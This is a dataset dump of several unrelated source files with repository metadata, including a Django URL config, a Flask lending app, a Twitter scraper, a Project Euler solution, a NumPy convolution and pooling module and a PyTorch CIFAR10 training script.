sys.argv[0], '|'.join('--'+opt for opt in valid_opts)))
sys.exit(code)
try:
opts, args = getopt.getopt(sys.argv[1:], '', valid_opts)
except getopt.error:
exit_with_usage()
if not opts:
exit_with_usage()
pyver = sysconfig.get_config_var('VERSION')
getvar = sysconfig.get_config_var
opt_flags = [flag for (flag, val) in opts]
if '--help' in opt_flags:
exit_with_usage(code=0)
for opt in opt_flags:
if opt == '--prefix':
print(sysconfig.get_config_var('prefix'))
elif opt == '--exec-prefix':
print(sysconfig.get_config_var('exec_prefix'))
elif opt in ('--includes', '--cflags'):
flags = ['-I' + sysconfig.get_path('include'),
'-I' + sysconfig.get_path('platinclude')]
if opt == '--cflags':
flags.extend(getvar('CFLAGS').split())
print(' '.join(flags))
elif opt in ('--libs', '--ldflags'):
abiflags = getattr(sys, 'abiflags', '')
libs = ['-lpython' + pyver + abiflags]
libs += getvar('LIBS').split()
libs += getvar('SYSLIBS').split()
# add the prefix/lib/pythonX.Y/config dir, but only if there is no
# shared library in prefix/lib/.
if opt == '--ldflags':
if not getvar('Py_ENABLE_SHARED'):
libs.insert(0, '-L' + getvar('LIBPL'))
if not getvar('PYTHONFRAMEWORK'):
libs.extend(getvar('LINKFORSHARED').split())
print(' '.join(libs))
elif opt == '--extension-suffix':
ext_suffix = sysconfig.get_config_var('EXT_SUFFIX')
if ext_suffix is None:
ext_suffix = sysconfig.get_config_var('SO')
print(ext_suffix)
elif opt == '--abiflags':
if not getattr(sys, 'abiflags', None):
exit_with_usage()
print(sys.abiflags)
elif opt == '--configdir':
print(sysconfig.get_config_var('LIBPL'))
|
[
"caroline@carolinecourtney.com"
] |
caroline@carolinecourtney.com
|
|
2c792ab5d17bbfbced2c1b30941ac5a73eb06cf3
|
6ec553e283ddb0bfdcec7cadca2c28afc473d41c
|
/daintree/urls.py
|
cbff6e40aaa1b6e17179d771da728d6253954477
|
[] |
no_license
|
rediumareanca/daintree
|
47acaa8d04d62bd7e0bff5807ef5621871d872db
|
af60988d84b14da8f1c2cc6b7aaf4dcb760fb012
|
refs/heads/master
| 2020-12-14T08:55:49.620700
| 2017-07-04T07:56:26
| 2017-07-04T07:56:26
| 95,537,532
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 845
|
py
|
"""daintree URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
from main.views import HomeView
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^$', HomeView.as_view(), name="home")
]
|
[
"rediumareanca@ya.ru"
] |
rediumareanca@ya.ru
|
1aa85aa87001cc872500fac6fce0517c0467f91e
|
ac727c519f41b04bb7b8518b64f0c426c93ab3c4
|
/Training/lendy/lendy.py
|
5e988144b51f8ad45762e37b437955f82ba9a3bf
|
[] |
no_license
|
gjwall/python
|
82e704af4ddc993499cd81dedb4f81336a9de23a
|
a553b03556bf1ef01c63e1dfe3c3c2d0eefa95bd
|
refs/heads/master
| 2021-01-21T06:19:12.078150
| 2017-03-10T21:51:43
| 2017-03-10T21:51:43
| 83,212,868
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,779
|
py
|
#!C:\python36\python.exe
'''
Created on 10 Mar 2017
@author: Graham
'''
import sqlite3
import os
import lendydata
from flask import Flask, request, session, g, redirect, url_for, abort, \
render_template, flash
from werkzeug.utils import redirect
from flask.templating import render_template
app = Flask(__name__)
# Load default config and override config from environment variable
app.config.update(dict(
DATABASE = os.path.join(app.root_path, 'lendy.db'),
DEBUG = True,
SECRET_KEY = "nickknackpaddywhack",
USERNAME = "admin",
PASSWORD = "DONOTUSE"
))
app.config.from_envvar("LENDY_SETTINGS", silent = True)
def get_db():
''' Opens a new database connection if one does not exist for our current
request context (the g object helps with this task)'''
if not hasattr(g, "sqlite_db"):
lendydata.initDB()
g.sqlite_db = lendydata.db
return g.sqlite_db
@app.teardown_appcontext
def close_db(error):
''' Closes the database again at the end of the request. Note that the "g"
object which makes sure we only operate on the current request '''
if hasattr(g, "sqllite_db"):
lendydata.closeDB()
@app.route("/")
@app.route("/login", methods = ["GET", "POST"])
def login():
error = None
if request.method == "POST":
if request.form["username"] != app.config["USERNAME"]:
error = "Invalid username"
elif request.form["password"] != app.config["PASSWORD"]:
error = "Invalid password"
else:
session["logged_in"] = True
flash("You were logged in")
return redirect(url_for("show_inventory"))
return render_template("login.html", error = error)
@app.route('/inventory')
def show_inventory():
get_db()
allItems = lendydata.get_items()
inventory = [dict(zip(['name','description'],[item[1],item[2]]))
for item in allItems]
return render_template('items.html', items=inventory)
@app.route('/add', methods=['POST'])
def add_item():
if not session.get('logged_in'):
abort(401)
get_db()
ownerID = [row[0] for row in lendydata.get_members()
if row[1] == request.form['owner']]
try: ownerID = ownerID[0]
except IndexError:
# implies no owners match name
# should raise error/create new member
ownerID = 1 # use default member for now.
lendydata.insert_item(request.form['name'],
request.form['description'],
ownerID,
request.form['price'],
request.form['condition'])
flash('New entry was successfully posted')
return redirect(url_for('show_inventory'))
if __name__ == "__main__":
app.run()
|
[
"gjwall@users.noreply.github.com"
] |
gjwall@users.noreply.github.com
|
daad0f74486a33b4879a5f91f2cee804d83863f7
|
6305a4ce6818083c3962d02de7f1471864bc9f49
|
/main.py
|
a19ed71fbd2b7c8b75c1c3eb7b9c6b1266702b4a
|
[
"MIT"
] |
permissive
|
marioyc/parse-ml-tweets
|
b79c5fa2819d9c48bf084648d55ed2671179f337
|
3bedf6c33682c85020dc07557b37cf9ccd3d9a63
|
refs/heads/master
| 2021-03-24T10:06:59.540849
| 2016-08-27T15:58:09
| 2016-08-27T15:58:09
| 66,718,089
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,056
|
py
|
import twitter
CONSUMER_KEY = ""
CONSUMER_SECRET = ""
ACCESS_TOKEN_KEY = ""
ACCESS_TOKEN_SECRET = ""
api = twitter.Api(consumer_key=CONSUMER_KEY,
consumer_secret=CONSUMER_SECRET,
access_token_key=ACCESS_TOKEN_KEY,
access_token_secret=ACCESS_TOKEN_SECRET)
USER_SCREEN_NAME = "StatMLPapers"
#user = api.GetUser(screen_name=USER_SCREEN_NAME)
#print(user.name + " : " + user.description + "\n")
def check(status):
return status.favorite_count + status.retweet_count >= 10
statuses = api.GetUserTimeline(screen_name=USER_SCREEN_NAME)
for s in statuses:
if check(s):
print(s.created_at, s.text, s.favorite_count, s.retweet_count)
for it in range(0,5):
print("")
max_id = statuses[-1].id
statuses = api.GetUserTimeline(screen_name=USER_SCREEN_NAME, max_id=max_id)
if len(statuses) == 1:
break
else:
statuses = statuses[1:]
for s in statuses:
if check(s):
print(s.created_at, s.text, s.favorite_count, s.retweet_count)
|
[
"ycmario@gmail.com"
] |
ycmario@gmail.com
|
13b2b9c390f93b4c58274db5a361c530327c3a2b
|
bbe74f172bf1f1cca1c77bd249c6f9a97ca897a4
|
/probs11-20/prob13.py
|
0e84fcee2846a2e45db91e51d3eefd773b8d39cf
|
[] |
no_license
|
kruthar/euler
|
5b32b7780502ff82e855c0c9670c91aff3938c5d
|
18a59531f2108074de3a7db29a77017663753abc
|
refs/heads/master
| 2021-01-13T13:19:54.723543
| 2016-02-22T14:53:45
| 2016-02-22T14:53:45
| 52,280,655
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,357
|
py
|
__author__ = 'kruthar'
'''
Large Sum
Work out the first ten digits of the sum of the following one-hundred 50-digit numbers.
37107287533902102798797998220837590246510135740250
46376937677490009712648124896970078050417018260538
74324986199524741059474233309513058123726617309629
91942213363574161572522430563301811072406154908250
23067588207539346171171980310421047513778063246676
89261670696623633820136378418383684178734361726757
28112879812849979408065481931592621691275889832738
44274228917432520321923589422876796487670272189318
47451445736001306439091167216856844588711603153276
70386486105843025439939619828917593665686757934951
62176457141856560629502157223196586755079324193331
64906352462741904929101432445813822663347944758178
92575867718337217661963751590579239728245598838407
58203565325359399008402633568948830189458628227828
80181199384826282014278194139940567587151170094390
35398664372827112653829987240784473053190104293586
86515506006295864861532075273371959191420517255829
71693888707715466499115593487603532921714970056938
54370070576826684624621495650076471787294438377604
53282654108756828443191190634694037855217779295145
36123272525000296071075082563815656710885258350721
45876576172410976447339110607218265236877223636045
17423706905851860660448207621209813287860733969412
81142660418086830619328460811191061556940512689692
51934325451728388641918047049293215058642563049483
62467221648435076201727918039944693004732956340691
15732444386908125794514089057706229429197107928209
55037687525678773091862540744969844508330393682126
18336384825330154686196124348767681297534375946515
80386287592878490201521685554828717201219257766954
78182833757993103614740356856449095527097864797581
16726320100436897842553539920931837441497806860984
48403098129077791799088218795327364475675590848030
87086987551392711854517078544161852424320693150332
59959406895756536782107074926966537676326235447210
69793950679652694742597709739166693763042633987085
41052684708299085211399427365734116182760315001271
65378607361501080857009149939512557028198746004375
35829035317434717326932123578154982629742552737307
94953759765105305946966067683156574377167401875275
88902802571733229619176668713819931811048770190271
25267680276078003013678680992525463401061632866526
36270218540497705585629946580636237993140746255962
24074486908231174977792365466257246923322810917141
91430288197103288597806669760892938638285025333403
34413065578016127815921815005561868836468420090470
23053081172816430487623791969842487255036638784583
11487696932154902810424020138335124462181441773470
63783299490636259666498587618221225225512486764533
67720186971698544312419572409913959008952310058822
95548255300263520781532296796249481641953868218774
76085327132285723110424803456124867697064507995236
37774242535411291684276865538926205024910326572967
23701913275725675285653248258265463092207058596522
29798860272258331913126375147341994889534765745501
18495701454879288984856827726077713721403798879715
38298203783031473527721580348144513491373226651381
34829543829199918180278916522431027392251122869539
40957953066405232632538044100059654939159879593635
29746152185502371307642255121183693803580388584903
41698116222072977186158236678424689157993532961922
62467957194401269043877107275048102390895523597457
23189706772547915061505504953922979530901129967519
86188088225875314529584099251203829009407770775672
11306739708304724483816533873502340845647058077308
82959174767140363198008187129011875491310547126581
97623331044818386269515456334926366572897563400500
42846280183517070527831839425882145521227251250327
55121603546981200581762165212827652751691296897789
32238195734329339946437501907836945765883352399886
75506164965184775180738168837861091527357929701337
62177842752192623401942399639168044983993173312731
32924185707147349566916674687634660915035914677504
99518671430235219628894890102423325116913619626622
73267460800591547471830798392868535206946944540724
76841822524674417161514036427982273348055556214818
97142617910342598647204516893989422179826088076852
87783646182799346313767754307809363333018982642090
10848802521674670883215120185883543223812876952786
71329612474782464538636993009049310363619763878039
62184073572399794223406235393808339651327408011116
66627891981488087797941876876144230030984490851411
60661826293682836764744779239180335110989069790714
85786944089552990653640447425576083659976645795096
66024396409905389607120198219976047599490197230297
64913982680032973156037120041377903785566085089252
16730939319872750275468906903707539413042652315011
94809377245048795150954100921645863754710598436791
78639167021187492431995700641917969777599028300699
15368713711936614952811305876380278410754449733078
40789923115535562561142322423255033685442488917353
44889911501440648020369068063960672322193204149535
41503128880339536053299340368006977710650566631954
81234880673210146739058568557934581403627822703280
82616570773948327592232845941706525094512325230608
22918802058777319719839450180888072429661980811197
77158542502016545090413245809786882778948721859617
72107838435069186155435662884062257473692284509516
20849603980134001723930671666823555245252804609722
53503534226472524250874054075591789781264330331690
'''
f = open('../data/data-prob13.txt', 'r');
total = 0
for line in f.readlines():
total += int(line)
print str(total)[0:10]
|
[
"kruthar@gmail.com"
] |
kruthar@gmail.com
|
95a31d8f1565fc8e7a66821758ac3eefce85f602
|
4fd0affb3da11fee35bc3d0e22a8acd3d6ebb159
|
/experiments/__main__.py
|
c3cb8147d37a224ae0709f3e8f6912f4222e356f
|
[
"MIT"
] |
permissive
|
hkrsnd/dilp-st
|
2876c4ed43414fe6fb5d8ab577038588dcccf1e9
|
54ef5b4a8393bf534493cbb85e8f5da80b51c14c
|
refs/heads/main
| 2023-04-19T14:01:30.624376
| 2021-05-24T11:46:56
| 2021-05-24T11:46:56
| 321,797,709
| 9
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,513
|
py
|
import sys
sys.path.append('datasets')
sys.path.append('datasets/append/')
sys.path.append('src/')
sys.path.append('experiments/')
from data_utils import DataUtils
from normal import normal_experiment
from noise import noise_experiment
from softor import softor_experiment
from step import step_experiment
import argparse
def main():
print(sys.argv[1] + ' experiments runnning')
parser = argparse.ArgumentParser(description='experiments')
parser.add_argument('type', default='noise', type=str,
help='type of experiments [noise, step, softor, normal]')
parser.add_argument('name', default='append', type=str,
help='name of the problem')
parser.add_argument('lr', default=1e-2, type=float, help='learning rate')
parser.add_argument('epoch', default=10000, type=int,
help='epoch in training')
parser.add_argument('m', default=3, type=int,
help='the size of the solution')
parser.add_argument('T', default=5, type=int, help='infer step')
parser.add_argument('--noise_rate', default=0.00,
type=float, help='noise rate of training data')
args = parser.parse_args()
if args.type == 'noise':
noise_experiment(args)
elif args.type == 'normal':
normal_experiment(args)
elif args.type == 'step':
step_experiment(args)
elif args.type == 'softor':
softor_experiment(args)
if __name__ == "__main__":
main()
|
[
"microapple56@gmail.com"
] |
microapple56@gmail.com
|
ebe2a975ab70d15d04ef4c8c6afb5060da022d78
|
8a5f0ab7839a729867baf9be9919fb8ba89009df
|
/bad_compute.py
|
e04049579d86fc30afde4aa87bba3bdbc452b9df
|
[] |
no_license
|
jdk-maxim/action-test-repo
|
ecd079cc064a619e56df62139332edb60b7fd201
|
e23e22fc4a40b51f0a12eac893226516a6b7f635
|
refs/heads/master
| 2023-01-14T00:56:07.931588
| 2020-11-20T22:51:08
| 2020-11-20T22:51:08
| 302,100,610
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 14,773
|
py
|
###################################################################################################
# Copyright (C) 2018-2020 Maxim Integrated Products, Inc. All Rights Reserved.
#
# Maxim Integrated Products, Inc. Default Copyright Notice:
# https://www.maximintegrated.com/en/aboutus/legal/copyrights.html
#
# Written by RM
###################################################################################################
"""
Pure Python implementation of Conv1d, Conv2d, ConvTranspose2d, Pool1d, Pool2d, Eltwise, and Linear.
Allows debug of individual accumulations.
NumPy implementation of Conv2d, ConvTranspose2d, Pool2d.
Compatible with PyTorch.
"""
import os
import sys
import numpy as np
from numpy.lib.stride_tricks import as_strided
import op
import stats
from eprint import eprint
"""
Comment for git change tweak
"""
debug_log = None
def debug_open(
layer,
base_directory,
test_name,
log_filename, # pylint: disable=unused-argument
):
"""
Create debug log for a layer
"""
global debug_log # pylint: disable=global-statement
debug_log = open(os.path.join(base_directory, test_name,
f'compute-{layer}.csv'), 'w')
def debug_print(
t,
):
"""
Print to the compute debug log
"""
global debug_log # pylint: disable=global-statement
print(t, file=debug_log)
def debug_close():
"""
Close the compute debug log
"""
global debug_log # pylint: disable=global-statement
debug_log.close()
def conv2d(
data,
weight,
bias,
input_size,
output_size,
kernel_size,
stride,
pad,
dilation,
fractional_stride,
output_pad,
groups=1,
debug=False,
):
"""
Compute a 2D convolution.
Note that all PyTorch numbers are ordered (C, H, W)
"""
assert data.shape == tuple(input_size)
in_channels = input_size[0]
out_channels = output_size[0]
if debug:
# Slow route using pure Python
ref = np.full(shape=output_size, fill_value=np.nan, dtype=np.int64)
debug_print('k,c,x,y,weight,data,prod,cacc,acc')
for k in range(out_channels):
for y in range(-pad[0],
input_size[1] - dilation[0] * (kernel_size[0] - 1) + pad[0],
stride[0]):
for y_frac in range(fractional_stride[0]):
for x in range(-pad[1],
input_size[2] - dilation[1] * (kernel_size[1] - 1) + pad[1],
stride[1]):
for x_frac in range(fractional_stride[1]):
val = np.int64(0)
c = 0
while True:
dc = c if groups == 1 else c + k * (in_channels // groups)
sval = np.int(0)
for h in range(kernel_size[0]):
for w in range(kernel_size[1]):
ypos = (y + pad[0])*fractional_stride[0] - pad[0] \
+ y_frac + h * dilation[0]
yd, yr = divmod(ypos, fractional_stride[0])
xpos = (x + pad[1])*fractional_stride[1] - pad[1] \
+ x_frac + w * dilation[1]
xd, xr = divmod(xpos, fractional_stride[1])
if yr == 0 and 0 <= yd < input_size[1] and \
xr == 0 and 0 <= xd < input_size[2]:
prod = weight[k][c][h][w] * data[dc][yd][xd]
sval += prod
val += prod
stats.true_macc += 1
debug_print(
f'{k},{c},{x},{y},{weight[k][c][h][w]},'
f'{data[dc][yd][xd]},{prod},{sval},{val}'
)
c += 16
if c >= in_channels // groups:
c = (c + 1) % 16
if c in (0, in_channels // groups):
break
if bias is not None:
val += bias[k]
debug_print(
f' adding bias: {bias[k]} -> result: {val}'
)
ref[k][
((y + pad[0])*fractional_stride[0] + y_frac) // stride[0]
][
((x + pad[1])*fractional_stride[1] + x_frac) // stride[1]
] = val
# Fast computation using NumPy
# Stretch data for fractionally-strided convolution
if fractional_stride[0] > 1 or fractional_stride[1] > 1:
ndata = np.zeros((data.shape[0],
data.shape[1] * fractional_stride[0],
data.shape[2] * fractional_stride[1]),
dtype=data.dtype)
ndata[:, 0::fractional_stride[0], 0::fractional_stride[1]] = data
data = ndata
# Create zero padding around data and stretch weights for dilation.
if pad[0] or pad[1] or output_pad[0] or output_pad[1]:
data = np.pad(data, pad_width=((0, 0),
(pad[0], pad[0]),
(pad[1], pad[1])),
mode='constant', constant_values=0)
if dilation[0] > 1 or dilation[1] > 1:
nweight = np.zeros((weight.shape[0], weight.shape[1],
(kernel_size[0] - 1) * dilation[0] + 1,
(kernel_size[1] - 1) * dilation[1] + 1),
dtype=weight.dtype)
nweight[:, :, 0::dilation[0], 0::dilation[1]] = weight
weight = nweight
h = (data.shape[1] - weight.shape[3] + 1) // stride[0] # Resulting output height
w = (data.shape[2] - weight.shape[2] + 1) // stride[1] # Resulting output width
view = as_strided(data,
shape=(h, w, data.shape[0], weight.shape[2], weight.shape[3]),
strides=((data.strides[1] * stride[0], data.strides[2] * stride[1],
data.strides[0], data.strides[1], data.strides[2])),
writeable=False)
if groups > 1:
nweight = np.zeros((weight.shape[0], in_channels, weight.shape[2], weight.shape[3]),
dtype=weight.dtype)
for i in range(weight.shape[0]):
for j in range(in_channels // groups):
nweight[i, i * (in_channels // groups) + j, :, :] = weight[i, j, :, :]
weight = nweight
output = np.tensordot(view, weight, axes=((2, 3, 4), (1, 2, 3))).transpose(2, 0, 1)
# Apply bias
if bias is not None:
for k in range(out_channels):
output[k] += bias[k]
if debug:
if not (ref == output).all():
eprint('NumPy <-> Python mismatch in compute.conv2d')
sys.exit(1)
assert output.shape == tuple(output_size)
return output
def conv1d(
data,
weight,
bias,
input_size,
output_size,
out_channels,
kernel_size,
stride,
pad,
dilation,
groups=1,
debug=False,
):
"""
Compute a 1D convolution.
Note that all PyTorch numbers are ordered (C, L)
"""
in_channels = input_size[0]
weight = weight.reshape(out_channels, input_size[0] // groups, -1)
data = data.reshape(input_size[0], -1)
output = np.full(shape=(output_size[0], output_size[1]),
fill_value=np.nan, dtype=np.int64)
# Compute 1D convolution
if debug:
debug_print('k,c,x,src_offs,wt_offs,weight,data,acc')
for k in range(out_channels):
out_offs = 0
for x in range(-pad, input_size[1] - dilation * (kernel_size - 1) + pad, stride):
val = np.int64(0)
for c in range(in_channels // groups):
dc = c if groups == 1 else c + k * (in_channels // groups)
for w in range(kernel_size):
src_offs = x + w * dilation
if 0 <= src_offs < input_size[1]:
val += weight[k][c][w] * data[dc][src_offs]
stats.true_macc += 1
if debug:
debug_print(
f'{k},{c},{x},{src_offs},{w},{weight[k][c][w]},'
f'{data[dc][src_offs]},{val}'
)
if bias is not None:
val += bias[k]
if debug:
debug_print(
f'+bias {bias[k]} --> output[{k}][{out_offs}] = {val}',
)
output[k][out_offs] = val
out_offs += 1
return output.reshape((output_size))
def linear(
data,
weight,
bias,
in_features,
out_features,
debug=False,
):
"""
Compute a fully connected layer.
"""
output = np.empty(out_features, dtype=np.int64)
for w in range(out_features):
val = np.int64(0)
for n in range(in_features):
val += data[n] * weight[w][n]
stats.true_sw_macc += 1
if debug:
debug_print(
f'w={w}, n={n}, weight={weight[w][n]}, data={data[n]} '
f'-> accumulator = {val} '
)
if bias is not None:
val += bias[w]
if debug:
debug_print(f'+bias {bias[w]} --> output[{w}] = {val}')
output[w] = val
return output
def pool2d(
data,
input_size,
output_size,
pool,
stride,
average,
floor=True,
debug=False,
):
"""
Compute 2D Pooling (Average or Max)
"""
assert data.shape == tuple(input_size)
if debug:
# Slow using pure Python
ref = np.empty(shape=output_size, dtype=np.int64)
for c in range(input_size[0]):
for row in range(0, output_size[1]*stride[0], stride[0]):
for col in range(0, output_size[2]*stride[1], stride[1]):
if average:
avg = np.average(data[c][row:row+pool[0], col:col+pool[1]])
if floor:
if avg < 0:
val = np.ceil(avg).astype(np.int64).clip(min=-128, max=127)
else:
val = np.floor(avg).astype(np.int64).clip(min=-128, max=127)
else:
val = np.floor(avg + 0.5).astype(np.int64).clip(min=-128, max=127)
else:
val = np.amax(data[c][row:row+pool[0], col:col+pool[1]])
ref[c][row//stride[0]][col//stride[1]] = val
# Fast computation using NumPy
data_pad = data[:, :(data.shape[1] - pool[0]) // stride[0] * stride[0] + pool[0],
:(data.shape[2] - pool[1]) // stride[1] * stride[1] + pool[1], ...]
h, w = data_pad.strides[1:]
view = as_strided(data_pad,
shape=(data_pad.shape[0],
1 + (data_pad.shape[1]-pool[0]) // stride[0],
1 + (data_pad.shape[2]-pool[1]) // stride[1],
pool[0], pool[1]),
strides=(data_pad.strides[0], stride[0] * h, stride[1] * w, h, w),
writeable=False)
if average:
if floor:
pooled = np.nanmean(view, dtype=np.int64, axis=(3, 4))
else:
pooled = np.round(np.nanmean(view, axis=(3, 4))).astype(np.int64)
else:
pooled = np.nanmax(view, axis=(3, 4))
if debug:
match = (ref == pooled).all()
if not match:
eprint('NumPy <-> Python mismatch in compute.pool2d')
sys.exit(1)
assert pooled.shape == tuple(output_size)
return pooled
def pool1d(
data,
input_size,
output_size,
pool,
stride,
average,
floor=True,
debug=False,
): # pylint: disable=unused-argument
"""
Compute 1D Pooling (Average or Max)
"""
assert data.shape == tuple(input_size)
pooled = np.empty(shape=output_size, dtype=np.int64)
for c in range(input_size[0]):
for x in range(0, output_size[1]*stride, stride):
if average:
avg = np.average(data[c][x:x+pool])
if avg < 0:
val = np.ceil(avg).astype(np.int64).clip(min=-128, max=127)
else:
val = np.floor(avg).astype(np.int64).clip(min=-128, max=127)
else:
val = np.amax(data[c][x:x+pool])
pooled[c][x//stride] = val
return pooled
def eltwise(
operator,
data,
input_size,
debug=False,
): # pylint: disable=unused-argument
"""
Compute element-wise operation.
"""
assert data[0].shape == tuple(input_size)
operands = len(data)
output = data[0]
for i in range(1, operands):
if operator == op.ELTWISE_ADD:
output = np.add(output, data[i])
elif operator == op.ELTWISE_MUL:
output = np.multiply(output, data[i])
elif operator == op.ELTWISE_OR:
output = np.bitwise_or(output, data[i])
elif operator == op.ELTWISE_SUB:
output = np.subtract(output, data[i])
elif operator == op.ELTWISE_XOR:
output = np.bitwise_xor(output, data[i])
else:
print(f"Unknown operator `{op.string(operator)}`")
raise NotImplementedError
assert output.shape == tuple(input_size)
return output
|
[
"jeremy.kongs@maximintegrated.com"
] |
jeremy.kongs@maximintegrated.com
|
78577dda9d4141161071de69b743051cb5579cd6
|
2b5f2a19e3ba345faef6bffac322035b62858a00
|
/pancakeSorting.py
|
086e3a7bbd00137be6589ebc3125941b245a2800
|
[] |
no_license
|
QuiveryNinja/pancakeAlgorithm
|
9416478ed1fc479462d7beb03d31ff3cbb874b47
|
810ebc9d57e62b6bafc8bda508eea4dc26bde7ef
|
refs/heads/master
| 2022-12-23T16:31:20.040630
| 2020-09-30T17:26:45
| 2020-09-30T17:26:45
| 299,996,370
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 219
|
py
|
pancakes = [2,3,1,7,4,0,5]
plate = []
def SortPancakes():
pancakes.sort()
i = 0
while i in pancakes:
plate.append(pancakes[-1])
pancakes.pop(-1)
return plate
print(SortPancakes())
|
[
"noreply@github.com"
] |
QuiveryNinja.noreply@github.com
|
deb9a9a5bcbcf81070b70cbacf9f9c173d2f9875
|
1309ac4b1f497886010345fd41a14da469bf8780
|
/VaretyrSpearSimulation.py
|
3e5ae0a2418cbc6d4ea7e86963aba9ed71b68d65
|
[] |
no_license
|
sugky7302/Varetyr-Spear-Simulation
|
d851a69c283e42da211ffb021747c9aebf15076e
|
8ddc47c102beabf29e8c6674023058a16250822d
|
refs/heads/master
| 2020-03-26T04:57:06.312200
| 2018-08-13T08:00:05
| 2018-08-13T08:00:05
| 144,530,402
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,040
|
py
|
from tkinter import *
from tkinter import ttk
from tkinter import scrolledtext
_VERSION = '0.1.0'
# 創建主視窗
window = Tk()
window.title("聖槍刺擊 " + _VERSION)
class NewEntry:
def __init__ (self, labelText, column, row):
self.newObject = {}
self.newObject['label'] = ttk.Label(window, text = labelText)
self.newObject['label'].grid(column = column, row = row)
self.newObject['value'] = StringVar()
self.newObject['entry'] = ttk.Entry(window, width = 4, textvariable = self.newObject['value'])
self.newObject['entry'].grid(column = column + 1, row = row)
def get (self):
return int(self.newObject['value'].get())
# 第一列 素質
strength = NewEntry("STR:", 0, 0)
intelligence = NewEntry("INT:", 2, 0)
# 第二列 素質ATK+修鍊ATK
baseAtk = NewEntry("素質ATK:", 0, 1)
repairAtk = NewEntry("修鍊ATK:", 2, 1)
# 第三列 武器
weaponAtk = NewEntry("武器ATK:", 0, 2)
weaponLevel = NewEntry("武器等級:", 2, 2)
intensify = NewEntry("武器精鍊值:", 4, 2)
# 第四、五列 ATK增益效果
itemAtk = NewEntry("卡裝ATK:", 0, 3)
classAtk = NewEntry("階級&atk(%):", 2, 3)
raceAtk = NewEntry("種族(%):", 0, 4)
enemyAttribute = NewEntry("敵方屬性(%):", 2, 4)
# 第六列 素質MATK+武器MATK
baseMatk = NewEntry("素質MATK:", 0, 5)
weaponMatk = NewEntry("武器MATK:", 2, 5)
# 第七列 武器MATK+卡裝ATK
itemMatk = NewEntry("卡裝MATK:", 0, 6)
# 第八、九列 MATK增益效果
enchant = NewEntry("卡裝&附魔(%):", 0, 7)
raceMatk = NewEntry("種族&針對魔物(%):", 2, 7)
enemyAttributeForMagic = NewEntry("敵方屬性(%):", 0, 8)
myAttributeForMagic = NewEntry("自身屬性(%):", 2, 8)
# 第十列 技能增傷
skill = NewEntry("技能(%):", 0, 9)
# 第十一行 計算結果
def CalculateDamage ():
firstAtk = repairAtk.get() + baseAtk.get() * 2
secondAtk = weaponAtk.get() * (1 + strength.get() * 0.005 + weaponLevel.get() * 0.05) + 5 * intensify.get() + 8 * (intensify.get() + weaponLevel.get() - 8) + 18 * weaponLevel.get() + itemAtk.get()
secondAtkBuff = (1 + classAtk.get() / 100) * (1 + raceAtk.get() / 100) * (1 + enemyAttribute.get() / 100)
secondMatk = (weaponMatk.get() + 5 * intensify.get()) * (1 + 0.1 * weaponLevel.get()) + 8 * (intensify.get() + weaponLevel.get() - 8)
secondMatkBuff = (1 + enchant.get() / 100) * (1 + raceMatk.get() / 100) * (1 + enemyAttributeForMagic.get() / 100) * (1 + myAttributeForMagic.get() / 100)
return ((firstAtk + secondAtk * secondAtkBuff) * 8.75 + 4 * secondMatk * secondMatkBuff * ((5 * intelligence.get() / 100 + 2.5) * 1.75 + 1.8)) * (1 + skill.get() / 100)
def CalculateAction():
damage = str(CalculateDamage())
calculationLabel.config(text = damage)
calculation = ttk.Button(window, text = "計算", command = CalculateAction)
calculation.grid(column = 3, row = 10)
calculationLabel = ttk.Label(window, text = "")
calculationLabel.grid(column = 1, row = 10)
# 顯示主視窗
window.mainloop()
|
[
"sugky7302@gmail.com"
] |
sugky7302@gmail.com
|
b0b53b387467c7290b49d7c01a16691b782d9100
|
951b605ea41da28dccba6d3de63fb9211b7ad5b1
|
/Mains/main.py
|
f3cabc1b8e650a5af81217b1b118a57e8a7327f4
|
[
"MIT"
] |
permissive
|
tiangeluo/DefectiveCNN
|
99296f7a86efd3c4d044701f4e94388989cbd66a
|
fdbf5235adffa846630fadb4ff910de50870c077
|
refs/heads/master
| 2022-01-29T14:23:10.198712
| 2022-01-08T22:20:54
| 2022-01-08T22:20:54
| 222,830,775
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,648
|
py
|
'''Train CIFAR10 with PyTorch.'''
from __future__ import print_function
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
import torch.backends.cudnn as cudnn
import torchvision
import torchvision.transforms as transforms
import os
import argparse
#from models import *
from resnet import ResNet18
#from resnet_drop import ResNet18
from utils import progress_bar
from torch.optim.lr_scheduler import MultiStepLR
parser = argparse.ArgumentParser(description='PyTorch CIFAR10 Training')
parser.add_argument('--lr', default=0.1, type=float, help='learning rate')
parser.add_argument('--resume', '-r', action='store_true', help='resume from checkpoint')
args = parser.parse_args()
device = 'cuda' if torch.cuda.is_available() else 'cpu'
best_acc = 0 # best test accuracy
start_epoch = 0 # start from epoch 0 or last checkpoint epoch
# Data
print('==> Preparing data..')
transform_train = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
transform_test = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
trainset = torchvision.datasets.CIFAR10(root='./data', train=True, download=True, transform=transform_train)
trainloader = torch.utils.data.DataLoader(trainset, batch_size=128, shuffle=True, num_workers=2)
